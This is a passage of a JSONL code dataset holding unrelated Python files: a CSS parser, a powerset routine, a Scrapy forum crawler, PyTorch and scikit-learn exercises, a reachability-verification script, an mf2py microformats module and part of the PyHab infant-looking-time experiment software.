HashToken and node.value == \"lpChat\":\n selector_string += \"$lpWindowElementId\"\n elif type(node) is not CurlyBracketsBlock:\n selector_string += node.value\n return selector_string\n\n def _get_curly_brackets_block(self, rule):\n for node in rule:\n if type(node) is CurlyBracketsBlock:\n return node\n \n def _get_css_properties_string(self, curly_brackets):\n print(\"DEBUG: Curly Brackets Is: \", curly_brackets.content)\n trimmed_content = self._remove_whitespace_nodes(curly_brackets.content)\n css_properties = \"\"\n for content_index in range(len(trimmed_content)):\n node = trimmed_content[content_index]\n if type(node) is WhitespaceToken:\n css_properties += \" \"\n else:\n css_properties += node.serialize()\n return css_properties\n\n def generate_value_objects(self):\n ''' Will take the state of the self.rule attribute and create an array of \n value objects to add to the base taglet config object '''\n \n base_object = {\n \"selector\": \"\",\n \"outcomes\": {}\n }\n\n values = []\n for rule_type in self.rule_types:\n temp_value = copy.deepcopy(base_object)\n temp_value[\"selector\"] = self.selector_string\n temp_value[\"outcomes\"][rule_type] = [{\n \"type\": \"style\",\n \"value\": self.css_properties\n }]\n values.append(temp_value)\n return values\n","sub_path":"css_parser.py","file_name":"css_parser.py","file_ext":"py","file_size_in_byte":4692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"26022615","text":"# time: O(n * 2^n)\n# space: O(n * 2^n)\n# where n is the length 
of the input array\ndef powersetIterative(array):\n subsets = [[]]\n for elem in array:\n for i in range(len(subsets)):\n current = subsets[i]\n subsets.append(current + [elem])\n return subsets\n\ndef powersetRecursive(array, i = None):\n if i is None:\n i = len(array) - 1\n if i < 0:\n return [[]]\n elem = array[i]\n subsets = powersetRecursive(array, i - 1)\n for i in range(len(subsets)):\n currentSubset = subsets[i]\n subsets.append(currentSubset + [elem])\n return subsets\n\nprint(powersetIterative([1, 2, 3])) # [[], [1], [2], [1, 2], [3], [1, 3], [2, 3], [1, 2, 3]]\n","sub_path":"algo-expert/medium/recursion/powerset.py","file_name":"powerset.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"248630301","text":"#!/usr/bin/python\nimport uuid\nimport scrapy\nfrom scrapy.spiders import Rule, CrawlSpider\nfrom scrapy.linkextractors import LinkExtractor\n\nfrom w3lib.html import remove_tags\nfrom ..items import ILoader, IItem, PostItem, PostLoader, created_at, clean_body\n\n\nclass ISpyder(CrawlSpider):\n name = ''\n allowed_domains = ['']\n start_urls = ['']\n\n rules = (\n Rule(LinkExtractor(allow=('viewforum', ), deny=('profile',)), follow=True, callback='parse_forum'),\n )\n\n def parse_forum(self, response):\n for x in response.xpath('//span[@class=\"topictitle\"]/a/@href'):\n yield scrapy.Request(response.urljoin(x.extract()), callback=self.parse_thread)\n\n def parse_thread(self, response):\n if response.meta.get('loader', ''):\n loader = response.meta['loader']\n thread_uuid = response.meta['thread_uuid']\n else:\n loader = ILoader(item=IItem(), response=response)\n thread_uuid = uuid.uuid4()\n loader.add_value('uuid', thread_uuid)\n loader.add_value('forum_uuid', 'XYZ')\n loader.add_value('third_party_id', response.url)\n loader.add_xpath('name', '//a[@class=\"maintitle\"]/text()')\n loader.add_xpath('created_at', '(//span[@class=\"postdetails\"][contains(text(),\"Posted\")]/text())[1]')\n loader.add_value('url', response.url)\n posts = []\n for id, name, date, body in zip(\n response.xpath('//span[@class=\"name\"]/a/@name').extract(),\n response.xpath('//span[@class=\"name\"]/b/text()').extract(),\n created_at(response.xpath(\n '(//span[@class=\"postdetails\"][contains(text(),\"Posted: \")]/text())').extract()[0::2]),\n clean_body(response.xpath('//tr/td[@colspan=\"2\"]').extract()[3:-1:3])\n ):\n post = PostItem()\n post['uuid'] = uuid.uuid4()\n post['thread_uuid'] = thread_uuid\n post['third_party_id'] = id\n post['member_name'] = name\n post['body'] = body\n post['created_at'] = date\n posts.append(post)\n loader.add_value('posts', posts)\n next_page = response.xpath('//a[text()=\"Next\"]/@href')\n if next_page:\n request = scrapy.Request(response.urljoin(next_page.extract()[0]), callback=self.parse_thread)\n request.meta['loader'] = loader\n request.meta['thread_uuid'] = thread_uuid\n yield request\n else:\n yield loader.load_item()\n","sub_path":"ispider.py","file_name":"ispider.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"608550814","text":"import torch\nimport torch.nn as nn\nimport torch.autograd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom DataGenerator import DataGenerator\n\nclass NNModel(nn.Module):\n def __init__(self, in_dim: int, out_dim: int, hidden_dim: list) -> None:\n super(NNModel, self).__init__()\n self.hidden_layer_num = len(hidden_dim)\n 
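# Illustrative note (the concrete sizes come from the __main__ calls at the bottom of this\n        # file): hidden_dim is padded with the input and output sizes to form the chain of layer\n        # widths, e.g. NNModel(2, 1, [4, 2]) yields [2, 4, 2, 1], i.e. Linear(2,4)+Tanh,\n        # Linear(4,2)+Tanh, and a final Linear(2,1).\n        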
hidden_dim = [in_dim] + hidden_dim + [out_dim]\n        # a plain Python list does not register sub-layers with nn.Module, so the optimizer\n        # would never see the earlier hidden layers' parameters; ModuleList registers them\n        self.layers = nn.ModuleList()\n        for i in range(self.hidden_layer_num):\n            self.layers.append(nn.Sequential(\n                nn.Linear(hidden_dim[i], hidden_dim[i+1]),\n                nn.Tanh()\n            ))\n        if self.hidden_layer_num:\n            self.layers.append(nn.Linear(hidden_dim[-2], hidden_dim[-1]))\n\n    def forward(self, x: np.ndarray) -> np.ndarray:\n        for layer in self.layers:\n            x = layer(x)\n        return x\n\n\ndef draw_split_line(x: np.ndarray, y: np.ndarray, model: nn.Module) -> None:\n    x_min, x_max = x[:, 0].min() - 0.1, x[:, 0].max() + 0.1\n    y_min, y_max = x[:, 1].min() - 0.1, x[:, 1].max() + 0.1\n    h = 0.05\n    xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n    out = model(torch.from_numpy(np.c_[xx.ravel(), yy.ravel()]).float()).data.numpy()\n    out = out > 0.5\n    out = out.reshape(xx.shape)\n    plt.contourf(xx, yy, out, cmap=plt.cm.Spectral)\n    plt.ylabel('x2')\n    plt.xlabel('x1')\n    plt.scatter(x[:, 0], x[:, 1], c=y.reshape(-1), s=40, cmap=plt.cm.Spectral)\n    plt.show()\n\ndef get_shuffle_data():\n    data_generator = DataGenerator()\n    x_, y_ = data_generator.generate()\n    x_, y_ = np.array(x_), np.array(y_)\n    idx = np.arange(len(x_))\n    np.random.shuffle(idx)\n    x_, y_ = x_[idx], y_[idx]\n    return x_, y_\n\n\ndef get_torch_model(hidden_dim, x_, y_):\n    # x_, y_ = get_shuffle_data()\n    model = NNModel(2, 1, hidden_dim) \n    optimizer = torch.optim.Adam(model.parameters(), lr=1e-2)\n    criterion = nn.BCEWithLogitsLoss()\n    num_epochs = 5000\n    for epoch in range(num_epochs):\n        out = model.forward(torch.from_numpy(x_).float())\n        loss = criterion(out, torch.from_numpy(y_).float())\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n        if epoch % 200 == 0:\n            print(loss.detach().numpy())\n    \n    draw_split_line(x_, y_, model) \n    return model\n\n\nif __name__ == \"__main__\":\n    x_, y_ = get_shuffle_data()\n    get_torch_model([4], x_, y_)\n    get_torch_model([4, 2], x_, y_)","sub_path":"Assignment/A2 BP Network/NNWithTorch.py","file_name":"NNWithTorch.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"6815392","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 22 22:59:35 2018\r\n\r\n@author: Fwh_FrozenFire\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\ndf_concrete = pd.read_csv('concrete.csv')\r\nprint(df_concrete.head())\r\nprint(df_concrete.info())\r\ndf_concrete.columns = ['cement','slag','ash','water','superplastic','coarseagg','fineagg','age','strength']\r\ny=df_concrete['strength']\r\nX=df_concrete.drop(['strength'],axis = 1)\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.2, random_state=42)\r\nprint(\"=================================================================\")\r\n###################EDA####################\r\n\r\n#Pairplot\r\nsns.set(style='whitegrid', context='notebook')\r\ncols = ['cement','slag','ash','water','superplastic','coarseagg','fineagg','age','strength']\r\nsns.pairplot(df_concrete[cols], size=1.9)\r\nplt.show()\r\nprint(\"=================================================================\")\r\n#Heatmap\r\ncm = np.corrcoef(df_concrete[cols].values.T)\r\nsns.set(font_scale=1.5)\r\nfig, hm = plt.subplots(figsize=(10,10)) \r\nhm = sns.heatmap(cm, cbar=True,annot=True, 
square=True,fmt='.2f',annot_kws={'size': 15},yticklabels=cols,xticklabels=cols)\r\nplt.figure(figsize=(40,40))\r\nplt.show()\r\nprint(\"=================================================================\")\r\n#################Linear Regression##################\r\nfrom sklearn.linear_model import LinearRegression\r\nreg = LinearRegression(normalize = True)\r\nreg.fit(X_train,y_train)\r\ny_pred = reg.predict(X_test)\r\nplt.plot(X_test, y_pred, color='black', linewidth=3)\r\nplt.show()\r\n\r\n\r\n#Residual plot\r\nplt.scatter(y_pred,y_pred-y_test,\tc='blue',marker='s',edgecolor='white',\tlabel='Test data')\r\nplt.xlabel('Predicted values LINEAR')\r\nplt.ylabel('Residuals')\r\nplt.legend(loc='upper left')\r\nplt.hlines(y=0,xmin=0,xmax=100,color='black',lw=2)\r\nplt.xlim([0,100])\r\nplt.show()\r\nprint('Slope: %.3f' % reg.coef_[0],reg.coef_[1],reg.coef_[2],reg.coef_[3],reg.coef_[4]\r\n ,reg.coef_[5],reg.coef_[6],reg.coef_[7])\r\nprint('Y-Intercept: %.3f' % reg.intercept_)\r\n\r\nprint(\"R^2: {}\".format(reg.score(X_test, y_test)))\r\nmse = mean_squared_error(y_test,y_pred)\r\nprint(\"MSE: {}\".format(mse))\r\nprint(\"=================================================================\")\r\n################Ridge###################\r\nfrom sklearn.linear_model import Ridge\r\nridge = Ridge(alpha=0.1)\r\nridge.fit(X_train,y_train)\r\ny_predR = ridge.predict(X_test)\r\n\r\nplt.scatter(y_predR,y_predR-y_test,\tc='blue',marker='s',edgecolor='white',\tlabel='Test data')\r\nplt.xlabel('Predicted values RIDGE')\r\nplt.ylabel('Residuals')\r\nplt.legend(loc='upper left')\r\nplt.hlines(y=0,xmin=0,xmax=100,color='black',lw=2)\r\nplt.xlim([0,100])\r\nplt.show()\r\nprint('Slope: %.3f' % ridge.coef_[0],ridge.coef_[1],ridge.coef_[2],ridge.coef_[3],ridge.coef_[4]\r\n ,ridge.coef_[5],ridge.coef_[6],ridge.coef_[7])\r\nprint('Y-Intercept: %.3f' % ridge.intercept_)\r\n\r\nprint(\"R^2: {}\".format(ridge.score(X_test, y_test)))\r\nmse = mean_squared_error(y_test,y_predR)\r\nprint(\"MSE: {}\".format(mse))\r\n\r\nprint(\"=================================================================\")\r\n################Lasso###################\r\nfrom sklearn.linear_model import Lasso\r\nlasso = Lasso(alpha=0.1)\r\nlasso.fit(X_train,y_train)\r\ny_predL = lasso.predict(X_test)\r\n\r\nplt.scatter(y_predL,y_predL-y_test,\tc='blue',marker='s',edgecolor='white',\tlabel='Test data')\r\nplt.xlabel('Predicted values LASSO')\r\nplt.ylabel('Residuals')\r\nplt.legend(loc='upper left')\r\nplt.hlines(y=0,xmin=0,xmax=100,color='black',lw=2)\r\nplt.xlim([0,100])\r\nplt.show()\r\nprint('Slope: %.3f' % lasso.coef_[0],lasso.coef_[1],lasso.coef_[2],lasso.coef_[3],lasso.coef_[4]\r\n ,lasso.coef_[5],lasso.coef_[6],lasso.coef_[7])\r\nprint('Y-Intercept: %.3f' % lasso.intercept_)\r\n\r\nprint(\"R^2: {}\".format(lasso.score(X_test, y_test)))\r\nmse = mean_squared_error(y_test,y_predL)\r\nprint(\"MSE: {}\".format(mse))\r\nprint(\"=================================================================\")\r\n################Elastic###################\r\nfrom sklearn.linear_model import ElasticNet\r\nelanet = ElasticNet(alpha=0.1, l1_ratio=0.5)\r\nelanet.fit(X_train,y_train)\r\ny_predE = elanet.predict(X_test)\r\n\r\nplt.scatter(y_predE,y_predE-y_test,\tc='blue',marker='s',edgecolor='white',\tlabel='Test data')\r\nplt.xlabel('Predicted values ELASTICNET')\r\nplt.ylabel('Residuals')\r\nplt.legend(loc='upper left')\r\nplt.hlines(y=0,xmin=0,xmax=100,color='black',lw=2)\r\nplt.xlim([0,100])\r\nplt.show()\r\nprint('Slope: %.3f' % 
elanet.coef_[0],elanet.coef_[1],elanet.coef_[2],elanet.coef_[3],elanet.coef_[4]\r\n ,elanet.coef_[5],elanet.coef_[6],elanet.coef_[7])\r\nprint('Y-Intercept: %.3f' % elanet.intercept_)\r\n\r\nprint(\"R^2: {}\".format(elanet.score(X_test, y_test)))\r\nmse = mean_squared_error(y_test,y_predE)\r\nprint(\"MSE: {}\".format(mse))\r\n\r\n###################################################\r\nprint(\"=================================================================\")\r\nprint(\"My name is Ning Fan\")\r\nprint(\"My NetID is: 673869376\")\r\nprint(\"I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"IE598_F18_HW4/DA_Concrete.py","file_name":"DA_Concrete.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"563321035","text":"import heapq\n\nimport networkx\nimport numpy as np\nimport progressbar\nimport ray\nimport torch\nfrom py4j.java_gateway import JavaGateway\nfrom ray.rllib.agents.ppo import ppo\n\nfrom environment.bouncing_ball_old import BouncingBall\nfrom polyhedra.experiments_nn_analysis import Experiment\nfrom runnables.runnable.templates import polytope\nfrom runnables.runnable.templates.dikin_walk_simplified import plot_points_and_prediction\nfrom training.ppo.tune.tune_train_PPO_bouncing_ball import get_PPO_config\nfrom training.ray_utils import convert_ray_policy_to_sequential\n\nray.init()\nnn_path = \"/home/edoardo/ray_results/tune_PPO_bouncing_ball/PPO_BouncingBall_71684_00004_4_2021-01-18_23-48-21/checkpoint_10/checkpoint-10\"\nconfig = get_PPO_config(1234, use_gpu=0)\ntrainer = ppo.PPOTrainer(config=config)\ntrainer.restore(nn_path)\npolicy = trainer.get_policy()\nsequential_nn = convert_ray_policy_to_sequential(policy).cpu()\nlayers = []\nfor l in sequential_nn:\n layers.append(l)\nnn = torch.nn.Sequential(*layers)\nhorizon = 10\n\ngateway = JavaGateway(auto_field=True)\nmc = gateway.jvm.explicit.MDPModelChecker(None)\nanalysis_template = Experiment.box(2)\nboundaries = [6, -5, 1, 1]\nsamples = polytope.sample(2000, analysis_template, np.array(boundaries, dtype=float))\npoint_probabilities = []\nfor i, point in enumerate(samples):\n # generate prism graph\n\n frontier = [(0, point)]\n root = point\n graph = networkx.DiGraph()\n widgets = [progressbar.Variable('frontier'), \", \", progressbar.Variable('max_t'), \", \", progressbar.widgets.Timer()]\n # with progressbar.ProgressBar(widgets=widgets) as bar_main:\n while len(frontier) != 0:\n t, state = heapq.heappop(frontier)\n # bar_main.update(frontier=len(frontier), max_t=t)\n if t > horizon:\n break\n action_prob = torch.softmax(nn(torch.tensor(state, dtype=torch.float)), 0)\n for action in range(2):\n successor, cost, done, _ = BouncingBall.calculate_successor(state, action)\n graph.add_edge(tuple(state), tuple(successor), p=action_prob[action].item())\n graph.nodes[tuple(successor)][\"done\"] = done\n if not done:\n heapq.heappush(frontier, (t + 1, tuple(successor)))\n else:\n print(\"Terminal state found\")\n gateway = JavaGateway(auto_field=True, python_proxy_port=25334)\n mdp = gateway.entry_point.reset_mdp()\n gateway.entry_point.add_states(graph.number_of_nodes())\n mapping = dict(zip(graph.nodes(), range(graph.number_of_nodes())))\n # with StandardProgressBar(prefix=\"Updating Prism \", max_value=graph.number_of_nodes()).start() as bar:\n for parent_id, successors in graph.adjacency(): # generate the edges\n if 
len(successors.items()) != 0: # filter out non-reachable states\n distribution = gateway.newDistribution()\n for successor_id, eattr in successors.items():\n p = eattr.get(\"p\")\n distribution.add(int(mapping[successor_id]), p)\n mdp.addActionLabelledChoice(int(mapping[parent_id]), distribution, 0)\n else:\n # zero successors\n pass\n # bar.update(bar.value + 1) # else: # print(f\"Non descending item found\") # to_remove.append(parent_id) # pass\n print(f\"Point {i} done\")\n terminal = []\n for node, attr in graph.nodes.items():\n if attr.get(\"done\"):\n terminal.append(node)\n terminal_states = [mapping[x] for x in terminal]\n if len(terminal_states) != 0:\n # terminal_states_java = ListConverter().convert(terminal_states, gateway._gateway_client)\n mdpsimple = gateway.entry_point.getMdpSimple()\n mdpsimple.findDeadlocks(True)\n mc = gateway.jvm.explicit.MDPModelChecker(None)\n if (mc.getSettings() is None):\n mc.setSettings(gateway.jvm.prism.PrismSettings())\n target = gateway.jvm.java.util.BitSet()\n for id in terminal_states:\n target.set(id)\n res1 = mc.computeReachProbs(mdpsimple, target, False)\n sol1 = res1.soln\n maxprob = list(sol1)[0]\n res2 = mc.computeReachProbs(mdpsimple, target, True)\n sol2 = res2.soln\n minprob = list(sol2)[0]\n else:\n maxprob = 0\n minprob = 0\n point_probabilities.append((minprob, maxprob))\ntemplate_2d: np.ndarray = np.array([[0, 1], [1, 0]])\n# show_polygons(analysis_template, samples, template_2d, [x[0] for x in point_probabilities])\nplot_points_and_prediction(samples @ template_2d.T, np.array([x[0] for x in point_probabilities]))\n","sub_path":"runnables/verification_runs/run_bouncing_ball_sampleprob.py","file_name":"run_bouncing_ball_sampleprob.py","file_ext":"py","file_size_in_byte":4545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"320860388","text":"# coding: utf-8\n\"\"\"Looks for classic microformats class names and augments them with\nmicroformats2 names. Ported and adapted from php-mf2.\n\"\"\"\n\nfrom __future__ import unicode_literals, print_function\nfrom .dom_helpers import get_descendents\nfrom . 
import mf2_classes\nimport bs4\nimport copy\nimport os\nimport codecs\nimport json\n\nimport sys\nif sys.version < '3':\n from urllib import unquote\nelse:\n from urllib.parse import unquote\n\n# Classic Root Classname map\nCLASSIC_ROOT_MAP = {}\n\n# Classic Root properties map\nCLASSIC_PROPERTY_MAP = {}\n\n# populate backcompat rules from JSON files\n\n_RULES_LOC = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'backcompat-rules')\n\nfor filename in os.listdir(_RULES_LOC):\n file_path = os.path.join(_RULES_LOC, filename)\n root = os.path.splitext(filename)[0]\n with codecs.open(file_path, 'r', 'utf-8') as f:\n rules = json.load(f)\n\n CLASSIC_ROOT_MAP[root] = rules['type'][0]\n CLASSIC_PROPERTY_MAP[root] = rules['properties']\n\n\n\ndef root(classes):\n \"\"\"get all backcompat root classnames\n \"\"\"\n return [c for c in classes if c in CLASSIC_ROOT_MAP]\n\n\ndef make_classes_rule(old_class, new_classes):\n \"\"\"Builds a rule for augmenting an mf1 class with its mf2\n equivalent(s).\n \"\"\"\n def f(child, **kwargs):\n child_classes = child.get('class', [])\n if old_class in child_classes:\n child_classes += [c for c in new_classes\n if c not in child_classes]\n child['class'] = child_classes\n return f\n\n\n# The RULES map has a list of rules for each root class type.\n# We'll build the vast majority of it from the CLASSIC_PROPERTY_MAP\nRULES = dict(\n (old_root, [make_classes_rule(old_class, new_classes)\n for old_class, new_classes in properties.items()])\n for old_root, properties in CLASSIC_PROPERTY_MAP.items())\n\n\ndef rel_bookmark_to_url_rule(child, **kwargs):\n \"\"\"rel=bookmark gets augmented with class=\"u-url\n \"\"\"\n child_classes = child.get('class', [])\n if ('bookmark' in child.get('rel', [])\n and 'u-url' not in child_classes):\n child_classes.append('u-url')\n child['class'] = child_classes\n\n\ndef rel_tag_to_category_rule(child, **kwargs):\n \"\"\"rel=tag converts to p-category using a special transformation (the\n category becomes the tag href's last path segment). 
This rule adds a new\n    data tag so that <a rel=\"tag\" href=\"http://example.com/tags/cat\">cat</a>\n    gets augmented with\n    <data class=\"category\" value=\"cat\"></data>\n    \"\"\"\n    rels = child.get('rel', [])\n    classes = child.get('class', [])\n    if ('tag' in rels and child.get('href')\n            and 'p-category' not in classes\n            and 'u-category' not in classes):\n        segments = [seg for seg in child.get('href').split('/') if seg]\n        if segments:\n            data = bs4.BeautifulSoup('<data></data>').data\n            # use mf1 class here so it doesn't get removed later\n            data['class'] = ['category']\n            data['value'] = unquote(segments[-1])\n            child.parent.append(data)\n\n\n# Augment with special rules\nRULES['hentry'] += [\n    rel_bookmark_to_url_rule,\n    rel_tag_to_category_rule,\n]\n\ndef apply_rules(el):\n    \"\"\"add modern classnames for older mf1 classnames\n\n    returns a copy of el and does not modify the original\n    \"\"\"\n\n    el_copy = copy.copy(el)\n\n    def apply_prop_rules_to_children(parent, rules):\n\n        for child in (c for c in parent.children if isinstance(c, bs4.Tag)):\n            classes = child.get('class',[])\n            # find existing mf2 properties if any and delete them\n            mf2_props = mf2_classes.property_classes(classes)\n            child['class'] = [cl for cl in classes if cl not in mf2_props]\n\n            # apply rules to change mf1 to mf2\n            for rule in rules:\n                rule(child)\n\n            # recurse if it's not a nested mf1 or mf2 root\n            if not (mf2_classes.root(classes) or root(classes)):\n                apply_prop_rules_to_children(child, rules)\n\n\n    # add mf2 root equivalent\n    classes = el_copy.get('class', [])\n    old_roots = root(classes)\n    for old_root in old_roots:\n        new_root = CLASSIC_ROOT_MAP[old_root]\n        if new_root not in classes:\n            el_copy['class'].append(new_root)\n\n\n    # add mf2 prop equivalent to descendents and remove existing mf2 props\n    rules = []\n    for old_root in old_roots:\n        rules.extend(RULES.get(old_root,[]))\n\n    apply_prop_rules_to_children(el_copy, rules)\n\n    return el_copy\n","sub_path":"mf2py/backcompat.py","file_name":"backcompat.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"308068932","text":"import os, sys\nfrom psychopy import gui, visual, event, core, data, monitors, tools, prefs, logging\nfrom psychopy.constants import (STARTED, PLAYING) # Added for new stimulus types\nprefs.hardware['audioLib'] = ['sounddevice']\nif os.name is 'posix':\n    prefs.general['audioDevice'] = ['Built-in Output']\nfrom psychopy import sound\nimport pyglet\nfrom pyglet import input as pyglet_input\nimport wx, random, csv\nfrom math import *\nfrom datetime import *\nfrom dateutil.relativedelta import *\nfrom copy import deepcopy # needed for exactly one usage in redotrial because it's the only reasonable way.\n\n# VM ADDED\nimport psychopy_tobii_infant as pti\nimport numpy as np\n\n\n# NOTE - VM REPLACED ALL INSTANCES OF \"self.keyboard[self.key.B]\" with \"self.lookingLeap()\"\n\n\nclass PyHab:\n    \"\"\"\n\n    PyHab looking time coding + stimulus control system\n\n    Jonathan Kominsky, 2016-2018\n\n    Keyboard coding: A = ready, B = coder 1 on, L = coder 2 on, R = abort trial, Y = end experiment (for fussouts)\n\n    Between-trials: R = redo previous trial, J = jump to test trial, I = insert additional habituation trial (hab only)\n\n    Throughout this script, win2 is the coder display, win is the stimulus presentation window.\n    dataMatrix is the primary data storage for the summary data file. It is a list of dicts, each\n    dict corresponds to a trial.\n\n    Anything called \"verbose\" is part of the verbose data file. 
There are up to four such structures:\n On (for gaze-on events)\n Off (for gaze-off events)\n On2 and Off2 (for the optional secondary coder)\n Each coder's on and off are recorded in a separate dict with trial, gaze on/off, start, end, and duration.\n\n \"\"\"\n\n def __init__(self, settingsDict):\n \"\"\"\n Read all settings from settings file\n\n :param settingsDict: a dict built from a csv by the launcher script and passed to the class\n :type settingsDict: dict\n \"\"\"\n if os.name is 'posix': # glorious simplicity of unix filesystem\n self.dirMarker = '/'\n otherOS = '\\\\'\n elif os.name is 'nt': # Nonsensical Windows-based contrarianism\n self.dirMarker = '\\\\'\n otherOS = '/'\n self.dataColumns = eval(settingsDict['dataColumns'])\n self.prefix = settingsDict['prefix'] # prefix for data files. All data filenames will start with this text.\n self.dataFolder = settingsDict['dataloc'] # datafolder, condpath,stimPath are the ones that need modification.\n if len(self.dataFolder) > 0 and self.dataFolder[-1] is not self.dirMarker:\n self.dataFolder = [self.dirMarker if x == otherOS else x for x in self.dataFolder]\n self.dataFolder = ''.join(self.dataFolder)\n # Create verbose data sub-folder. New in 0.8.\n self.verboseFolder = self.dataFolder + 'verbose' + self.dirMarker\n if not os.path.isdir(self.verboseFolder):\n os.makedirs(self.verboseFolder)\n\n\n # UNIVERSAL SETTINGS\n self.maxDur = eval(settingsDict['maxDur']) # maximum number of seconds in a trial - can be a constant or a dictionary with different times for EACH trial type (must include every type). {'A':20,'B':60} etc.\n self.playThrough = eval(settingsDict['playThrough']) # A dict which informs what kind of gaze-contingency each trial type follows.\n self.movieEnd = eval(settingsDict['movieEnd']) # A list of trial types that only end (in stim pres mode) on the end of the movie file associated with them.\n self.maxOff = eval(settingsDict['maxOff']) # maximum number of consecutive seconds of offtime to end trial - by trial type\n self.minOn = eval(settingsDict['minOn']) # minimum on-time for a trial (seconds) - by trial type\n self.blindPres = eval(settingsDict['blindPres']) # 0, 1, or 2. 0 = show everything. 1 = show trial number + status squares. 2 = no trial #, status squares do not indicate on/off\n self.autoAdvance = eval(settingsDict['autoAdvance']) # For creating studies where you don't want a lag between trials, just automatic advancement to the next.\n self.randPres = eval(settingsDict['randPres']) # controls whether the program will look for an external randomization file to determine presentation order\n # If not, hab will present the first thing in each of the lists above, and VoE will just go through the lists in order\n self.condPath = settingsDict['condPath'] # path for the condition file.\n self.condFile = settingsDict['condFile'] # if you have a condition file, put filename here (WITH EXTENSION). 
Must be .csv\n self.condList = eval(settingsDict['condList']) # list of conditions for the dropdown menu, if using random presentation.[SOON: GET AUTOMATICALLY FROM FILE]\n if len(self.condPath) > 0 and self.condPath[-1] is not self.dirMarker:\n self.condPath = [self.dirMarker if x == otherOS else x for x in self.condPath]\n self.condPath = ''.join(self.condPath)\n\n\n # ORDER OF PRESENTATION\n # NOTE: a SINGLE instance of 'Hab' will insert a contiguous habituation BLOCK of up to maxHabTrials.\n # Recommend you make sure repetitions of each trial type is a multiple of the list length, if you want even presentation\n self.trialOrder = eval(settingsDict['trialOrder'])\n\n # HABITUATION DESIGN SETTINGS\n self.maxHabTrials = eval(settingsDict['maxHabTrials']) # number of habituation trials in a HAB design\n self.setCritWindow = eval(settingsDict['setCritWindow']) # Number of trials to use when setting the habituation window, e.g., 3 = first three hab trials\n self.setCritDivisor = eval(settingsDict['setCritDivisor']) # Divide sum of looking time over first setHabWindow trials by this value. for average, set equal to setHabWindow. For sum, set to 1.\n self.setCritType = settingsDict['setCritType'] # Criterion set by dynamic window or first set of trials\n self.metCritWindow = eval(settingsDict['metCritWindow']) # size of moving window of trials to sum looking times and compare to habituation criterion.\n self.metCritDivisor = eval(settingsDict['metCritDivisor']) # If you want to compare, e.g., average rather than sum of looking times of last metCritWindow trials, change this accordingly.\n self.metCritStatic = settingsDict['metCritStatic'] # Criterion evaluated over moving or static windows\n self.habTrialList = eval(settingsDict['habTrialList']) # A new \"meta-hab\" trial type consisting of several sub-trial-types.\n if 'calcHabOver' in settingsDict.keys():\n self.calcHabOver = eval(settingsDict['calcHabOver'])\n else:\n if len(self.habTrialList) > 0:\n if 'Hab' in self.habTrialList:\n self.calcHabOver = ['Hab'] # Mimics old behavior\n else:\n self.calcHabOver = [self.habTrialList[-1]]\n else:\n self.calcHabOver = []\n if 'blockList' in settingsDict.keys():\n self.blockList = eval(settingsDict['blockList'])\n self.blockDataList = eval(settingsDict['blockDataList'])\n else:\n self.blockList = {}\n self.blockDataList = []\n\n\n # STIMULUS PRESENTATION SETTINGS\n self.stimPres = eval(settingsDict['stimPres']) # For determining if the program is for stimulus presentation (True) or if it's just coding looking times (False)\n if not self.stimPres:\n self.movieEnd = [] # So we don't run into trouble with trials not ending waiting for movies that don't exist.\n self.stimPath = settingsDict['stimPath'] # Folder where movie files can be located (if not in same folder as script)\n self.stimNames = eval(settingsDict['stimNames']) # A dict of trial types with associated lists of stimuli\n self.stimList = eval(settingsDict['stimList']) # List of all stimuli in the experiment.\n # Go through each item in stimlist, find its stimloc parameter, and replace \\\\ with / or vise-versa\n for [i,j] in self.stimList.items():\n try:\n j['stimLoc'] = ''.join([self.dirMarker if x == otherOS else x for x in j['stimLoc']])\n except KeyError: # For image/audio pairs\n j['audioLoc'] = ''.join([self.dirMarker if x == otherOS else x for x in j['audioLoc']])\n j['imageLoc'] = ''.join([self.dirMarker if x == otherOS else x for x in j['imageLoc']])\n\n self.screenWidth = eval(settingsDict['screenWidth']) # Display window width, 
in pixels\n self.screenHeight = eval(settingsDict['screenHeight']) # Display window height, in pixels\n self.screenColor = settingsDict['screenColor'] #Background color of stim window.\n self.movieWidth = eval(settingsDict['movieWidth']) # movie width\n self.movieHeight = eval(settingsDict['movieHeight']) # movie height\n self.screenIndex = eval(settingsDict['screenIndex']) # which monitor stimuli are presented on. 1 for secondary monitor, 0 for primary monitor.\n self.ISI = eval(settingsDict['ISI']) # time between loops (by trial type)\n # Backwards compatibility time!\n if type(self.ISI) is not dict:\n # Go through stimNames and make everything work\n tempISI = {}\n for [i,j] in self.stimNames.items():\n tempISI[i] = self.ISI\n self.ISI = tempISI\n try:\n self.expScreenIndex = eval(settingsDict['expScreenIndex'])\n except:\n if self.screenIndex == 1:\n self.expScreenIndex = 0\n else:\n self.expScreenIndex = 1\n\n # Secondary evals to make sure everything in the dictionaries that needs to be a number is one.\n # maxDur, maxOff, minOn, ISI\n for q in [self.maxDur, self.maxOff, self.minOn, self.ISI]:\n for [i,j] in q.items():\n if 